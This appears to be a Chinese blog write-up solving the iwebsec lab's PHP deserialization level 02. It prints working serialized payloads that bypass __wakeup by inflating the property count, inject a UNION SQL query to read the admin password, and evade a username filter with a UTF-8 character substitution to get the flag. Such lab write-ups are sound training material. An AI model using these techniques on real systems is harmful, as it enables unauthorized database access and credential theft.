iwebsec反序列化02

最新推荐文章于 2024-04-20 21:37:31 发布
最新推荐文章于 2024-04-20 21:37:31 发布
阅读量908 收藏 12
点赞数 8
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45875985/article/details/137230743
版权

序言

翻遍网上文章,未找到iwebsec靶场反序列化02关卡通关方式。

故写一篇,供大家一起学习进步。

环境

本人使用集成iwbsec靶场的虚拟机搭建靶场。

下载:iwebsec靶场

正文

首先访问反序列化靶场02

可以看到页面有源码显示,阅读源码

其中有几个重要函数:

show()、login()、__destruct()

下面依次说明:

show():输出从数据库中获取的username是数组中的元素的username和role

login():判断数据库中是否有用户名和密码为数组中元素的用户,如果有输出flag(当然要经过判断,才能输出)

__destruct():其中有call_user_func_array函数,调用回调函数,并把一个数组参数作为回调函数的参数。

最后对前端传入的data做判断

if(isset($_GET["data"])) {
    @unserialize($_GET["data"]);    
} else {
    new WEB("source", array());
}

02关卡需要我们获取一个flag

那么就需要在login函数处,输入正确的账号密码

而在show函数只能输出username和role,不能输出password(在__conn()函数中可以直接看到users表中的字段

所以我们首先要想办法获取password

那么涉及到数据库,且数据库语句可以直接在页面看到,我们可以使用sql注入获取password中的值

payload:

<?php

include "config.php";

class WEB{
    private $method;
    private $args;
    private $conn;

    public function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;

        $this->__conn();
    }

    function show() {
        list($username) = func_get_args();
        $sql = sprintf("SELECT * FROM users WHERE username='%s'", $username);
        $obj = $this->__query($sql);
        if ( $obj != false  ) {
            $this->__die( sprintf("%s is %s", $obj->username, $obj->role) );
        } else {
            $this->__die("error!");
        }

    }

    function login() {
        global $FLAG;

        list($username, $password) = func_get_args();
        $username = strtolower(trim(mysql_escape_string($username)));
        $password = strtolower(trim(mysql_escape_string($password)));

        $sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, $password);

        if ( $username == 'orange' || stripos($sql, 'orange') != false ) {
            $this->__die("Orange is so shy. He do not want to see you.");
        }

        $obj = $this->__query($sql);
        if ( $obj != false && $obj->role == 'admin'  ) {
            $this->__die("Hi, Orange! Here is your flag: " . $FLAG);
        } else {
            $this->__die("Admin only!");
        }
    }

    function source() {
        highlight_file(__FILE__);
    }

    function __conn() {
        global $db_host, $db_name, $db_user, $db_pass, $DEBUG;

        if (!$this->conn)
            $this->conn = mysql_connect($db_host, $db_user, $db_pass);
        mysql_select_db($db_name, $this->conn);

        if ($DEBUG) {
            $sql = "CREATE TABLE IF NOT EXISTS users ( 
                        username VARCHAR(64), 
                        password VARCHAR(64), 
                        role VARCHAR(64)
                    ) CHARACTER SET utf8";
            $this->__query($sql, $back=false);

            $sql = "INSERT INTO users VALUES ('orange', '$db_pass', 'admin'), ('phddaa', 'ddaa', 'user')";
            $this->__query($sql, $back=false);
        }

        mysql_query("SET names utf8");
        mysql_query("SET sql_mode = 'strict_all_tables'");
    }

    function __query($sql, $back=true) {
        $result = @mysql_query($sql);
        if ($back) {
            return @mysql_fetch_object($result);
        }
    }

    function __die($msg) {
        $this->__close();

        header("Content-Type: application/json");
        die( json_encode( array("msg"=> $msg) ) );
    }

    function __close() {
        mysql_close($this->conn);
    }

    function __destruct() {
        $this->__conn();

        if (in_array($this->method, array("show", "login", "source"))) {
            @call_user_func_array(array($this, $this->method), $this->args);
        } else {
            $this->__die("What do you do?");
        }

        $this->__close();
    }

    function __wakeup() {
        foreach($this->args as $k => $v) {
            $this->args[$k] = strtolower(trim(mysql_escape_string($v)));
        }
    }
}

$args = array("-1' union select password,password,password from users where username='orange'-- -");
$a = new WEB('show',$args);
$a_ser = serialize($a);
var_dump($a_ser);

将payload放到靶场中创建的wp02.php文件中,浏览器访问后

选中的部分为执行序列化后的结果,可以看到引号被HTML编码了,所以我们需要将HTML编码解码。

将&quot;替换为"

将&#0;替换为%00

将&#39;替换为'

替换的结果为

O:3:"WEB":3:{s:11:"%00WEB%00method";s:4:"show";s:9:"%00WEB%00args";a:1:{i:0;s:82:"-1' union select password,password,password from users where username='orange'-- -";}s:9:"%00WEB%00conn";i:0;}

但是需要绕过__wakeup函数,所以需要将对象属性个数的值替换为比真实值大的值

所以最后的payload为:

O:3:"WEB":4:{s:11:"%00WEB%00method";s:4:"show";s:9:"%00WEB%00args";a:1:{i:0;s:82:"-1' union select password,password,password from users where username='orange'-- -";}s:9:"%00WEB%00conn";i:0;}

将payload传入data中

可以看到密码为mall123mall

获取到密码后,就要使用login函数获取flag

构造payload

<?php

include "config.php";

class WEB{
    private $method;
    private $args;
    private $conn;

    public function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;

        $this->__conn();
    }

    function show() {
        list($username) = func_get_args();
        $sql = sprintf("SELECT * FROM users WHERE username='%s'", $username);
        $obj = $this->__query($sql);
        if ( $obj != false  ) {
            $this->__die( sprintf("%s is %s", $obj->username, $obj->role) );
        } else {
            $this->__die("error!");
        }

    }

    function login() {
        global $FLAG;

        list($username, $password) = func_get_args();
        $username = strtolower(trim(mysql_escape_string($username)));
        $password = strtolower(trim(mysql_escape_string($password)));

        $sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, $password);

        if ( $username == 'orange' || stripos($sql, 'orange') != false ) {
            $this->__die("Orange is so shy. He do not want to see you.");
        }

        $obj = $this->__query($sql);
        if ( $obj != false && $obj->role == 'admin'  ) {
            $this->__die("Hi, Orange! Here is your flag: " . $FLAG);
        } else {
            $this->__die("Admin only!");
        }
    }

    function source() {
        highlight_file(__FILE__);
    }

    function __conn() {
        global $db_host, $db_name, $db_user, $db_pass, $DEBUG;

        if (!$this->conn)
            $this->conn = mysql_connect($db_host, $db_user, $db_pass);
        mysql_select_db($db_name, $this->conn);

        if ($DEBUG) {
            $sql = "CREATE TABLE IF NOT EXISTS users ( 
                        username VARCHAR(64), 
                        password VARCHAR(64), 
                        role VARCHAR(64)
                    ) CHARACTER SET utf8";
            $this->__query($sql, $back=false);

            $sql = "INSERT INTO users VALUES ('orange', '$db_pass', 'admin'), ('phddaa', 'ddaa', 'user')";
            $this->__query($sql, $back=false);
        }

        mysql_query("SET names utf8");
        mysql_query("SET sql_mode = 'strict_all_tables'");
    }

    function __query($sql, $back=true) {
        $result = @mysql_query($sql);
        if ($back) {
            return @mysql_fetch_object($result);
        }
    }

    function __die($msg) {
        $this->__close();

        header("Content-Type: application/json");
        die( json_encode( array("msg"=> $msg) ) );
    }

    function __close() {
        mysql_close($this->conn);
    }

    function __destruct() {
        $this->__conn();

        if (in_array($this->method, array("show", "login", "source"))) {
            @call_user_func_array(array($this, $this->method), $this->args);
        } else {
            $this->__die("What do you do?");
        }

        $this->__close();
    }

    function __wakeup() {
        foreach($this->args as $k => $v) {
            $this->args[$k] = strtolower(trim(mysql_escape_string($v)));
        }
    }
}

$args = array("orange","mall123mall");
$a = new WEB('login',$args);
$a_ser = serialize($a);
print_r($a_ser);

将payload放到靶场中wp022.php中,浏览器访问

选中的部分为序列化后的内容

由于序列化时Private属性被序列化时,属性名会变成%00类名%00属性名,而浏览器没有显示%00

所以我们需要把%00补全

补全后的payload为:

O:3:"WEB":3:{s:11:"%00WEB%00method";s:5:"login";s:9:"%00WEB%00args";a:2:{i:0;s:6:"orange";i:1;s:11:"mall123mall";}s:9:"%00WEB%00conn";i:0;}

但是代码中if ( $username == 'orange' || stripos($sql, 'orange') != false )有对用户名的判断,所以需要使用%C3%83代替orange中的a进行绕过,那么,响应的长度就需要+1

最终payload为:

O:3:"WEB":3:{s:11:"%00WEB%00method";s:5:"login";s:9:"%00WEB%00args";a:2:{i:0;s:7:"or%C3%83nge";i:1;s:11:"mall123mall";}s:9:"%00WEB%00conn";i:0;}

将payload输入data中:

获取到flag。

天雨栗
关注
  • 8
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
iwebsec靶场(PHP反序列化
果粒程
03-08 809
iwebsec靶场(PHP反序列化
iwebsec靶场 反序列化关卡通关笔记1
mooyuan的博客
11-04 1194
iwebsec靶场反序列漏洞通关笔记。
Web安全:PHP反序列化漏洞的 测试(向服务器写入一句话.)
网络安全领域___专研者.
05-29 546
程序员在写代码时,没有对用户输入的序列化字符串做一个严格检测,导致恶意的用户可以控制反序列化的一个过程,因此导致XSS漏洞,代码执行,SQT注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。在进行反序列化的时候就有可能触发对象中的一些魔术方法.
Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)
网络安全领域___专研者.
04-24 2662
iwebsec 本质上是一个漏洞集成容器,里面集成了大量的漏洞环境.(如:集合了SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的web漏洞环境) Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身.
第38天:WEB漏洞-反序列化之PHP&JAVA全解(下)1
08-03
演示案例:Java 反序列化及命令执行代码测试WebGoat_Javaweb 靶场反序列化测试0x01 注入判断,获取管理员帐号密码:根据提示附件进行 java
iwebsec靶场 文件包含漏洞通关笔记5-远程文件包含绕过
最新发布
mooyuan的博客
04-20 1421
前言。
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
c#序列化和反序列化
05-24
什么叫反序列化? 就是再把介质中的东西还原成对象,把石子还原成人的过程。 在进行这些操作的时候都需要这个可以被序列化,要能被序列化,就得给类头加[Serializable]特性。 通常网络程序为了传输安全才这么做。不...
C# xml序列化和反序列化
01-05
在C#编程中,XML序列化和反序列化是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
shiro反序列化脚本.zip
07-28
标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
常见面试题 (中文清晰版)
06-01
常见面试题 (中文清晰版) 简单明了好资料 面试好帮手
反序列化工具
11-14
Java反序列化是一种将已序列化的对象状态转换回对象的过程,通常用于持久化数据或在网络间传输对象。在Java中,这个过程涉及到`ObjectInputStream`类的`readObject()`方法,它能够读取由`ObjectOutputStream`的`...
iwebsec靶场 命令执行漏洞通关笔记
mooyuan的博客
11-25 2997
iwebsec靶场的命令执行通关笔记,共有五个关卡,分别涉及到基础的命令执行漏洞、空格绕过、关键字绕过、通配符绕过、base64绕过共五方面的渗透。什么是命令执行漏洞?命令执行漏洞是服务器端没有对客户端用户输入的参数进行过滤,导致用户可以通过任意拼接系统命令,使服务器端成功执行任意系统命令。命令执行漏洞主要是服务端没有对执行命令的函数做出过滤导致的,因为在web服务程序有时候去需要调用执行命令的函数,所以如果没有对客户端用户输入的命令进行过滤,可能发生命令执行漏洞。
还原HITCON 2016一道web题(php反序列化漏洞)
洞若观火
07-27 3290
实验环境搭建:PHPstudy,火狐(backbar),notepad++; 原题目代码:https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2016/babytrick 本人在还原此题目时,因为mysql数据库用户名密码和方便调试等原因对源码的一些参数做了一些相应的改动,但是没有改变主要代码。 c...
搭建开源漏洞靶场iwebsec
zonei123的博客
01-07 3792
搭建开源漏洞靶场iwebsec
渗透系列之shiro反序列化漏洞检测及案例操作流程
Websec
09-15 6990
参考开源工具即可: https://github.com/feihong-cs/ShiroExploit 原文如下: ShiroExploit 支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持多种回显方式 使用说明 第一步:按要求输入要检测的目标URL和选择漏洞类型 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/
绕过waf mysql爆库_iwebsec刷题记录-SQL注入漏洞
weixin_39928844的博客
02-12 805
被推荐了这个web平台,感觉挺适合新手的,网上搜了下没看到有人写wp,这里本入门萌新来稍微整理下自己解题的过程SQL注入漏洞01-数字型注入http://localhost:32774/sqli/01.php?id=1'发现有报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL...
iwebsec靶场 XXE关卡通关笔记
mooyuan的博客
11-04 1575
iwebsec靶场xxe关卡通关笔记XML外部实体注入简称XXE漏洞。XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义,文档元素。内部声明是直接在XML文件内部声明的,对于安全人员来说基本没用。外部声明是引用XML以外的文件,有风险。外部实体注入可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等等。
weblogic预警及历史漏洞
a1b2c3是弱口令
10-17 1232
简介 1、 Oracle WebLogic CVE-2019-2891 漏洞预警 2、WebLogic历史漏洞回顾 1.预警 Oracle 官方发布了 2019 年 10 月的严重补丁更新 CPU(Critical Patch Update),其中修复了存在于 WebLogic 中的一个高危漏洞(CVE-2019-2891)。 1.1预警描述 此漏洞为远程代码执行漏洞,基于全球使用该产品用...
Java对象序列化与反序列化详解
"Java对象序列化与反序列化是将Java对象转化为二进制字节流,以便存储或在网络中传输。此过程涉及到Serializable和Externalizable接口,以及ObjectOutputStream和ObjectInputStream类。" 在Java中,对象的序列化是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值